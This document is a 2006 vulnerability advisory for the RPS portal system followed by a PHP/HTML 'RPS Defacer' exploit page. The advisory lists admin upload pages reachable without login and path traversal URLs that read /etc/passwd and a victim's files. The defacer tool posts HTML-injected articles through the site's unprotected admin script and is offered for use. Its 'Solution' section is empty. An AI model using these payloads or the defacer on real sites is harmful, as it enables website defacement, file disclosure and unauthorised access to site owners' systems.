###########################################################################
# Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 18/07/06
# Risk: medium
# Vendor Url: http://rps.rigtersir.com/
# Affected Software: RPS
# Non Affected: RPS V 4
#
#Info:
##################################################################
#UPLOAD FILES
# it allows the user to raise archives without having administration
privileges
#
#
#SQL inyección
#it allows the user to insert post without having to be admin with this can
make xss or
#HTML injection
#
#
#example of upload files
##################################################################
#
#http://www.vuln.com/[path]/adm/photos/images.php
#
#http://www.vuln.com/[path]//adm/down/files.php
#
##################################################################
#example  Remote Execution
##################################################################
#
#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
#
#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
# v1.0, 2.0 3.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
#Original Advisory: http://zeus.pccentervillaflores.com//13.txt
##################################################################

SQL inyección in "Articulos" exploit

<?php
/*
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
Date: 08/01/06
Website: www.elitemexico.org
*/
?>
<html>

<head>
<title>RPS Defacer</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<p align="center"><font face="Verdana" size="2"><b><u><font
color="#FF0000">RPS Defacer<br>
<br>
</font>
</u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX
~•</font></b></font></p>
<form method="POST"  ACTION="?action=enviar" name="rps_defacer">
    <center>
    <table border="0" cellpadding="5" cellspacing="0"
style="border-collapse: collapse" width="40%">
      <tr>
        <td width="100%"><b><font face="Verdana" size="1">Direccion:<br>
        <input type="text" name="url" size="30"
value="http://"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Autor:<br>
        <input type="text" name="autor" size="20"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font face="Verdana"><font size="1">Email:<br>
        <input type="text" name="email" size="20"></font></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Titulo:<br>
        <input type="text" name="titulo" size="30"></font></b></td>
      </tr>
      <tr>
        <td width="100%"><b><font size="1" face="Verdana">Contenido:
(Soporta
        HTML Inyection)<br>
        <textarea rows="13" name="articulo"
cols="55"></textarea></font></b></td>
      </tr>
      <tr>
        <td width="100%">
        <p align="center"><b><font face="Verdana" size="1">
        <input type="submit" value="Enviar" name="send">
        <input type="reset" value="Restablecer"
name="delete"></font></b></td>
      </tr>
    </table>
    </center>
  </div>
</form>
<?

if($action=="enviar"){

$web= $_POST['url'];

echo "<script LANGUAGE=\"JavaScript\">

var pagina=\"$web/adm/add_art.php\"
function redireccionar()
{
location.href=pagina
}
setTimeout (\"redireccionar()\", 0001);

</script>";
}
?>

</body>

</html>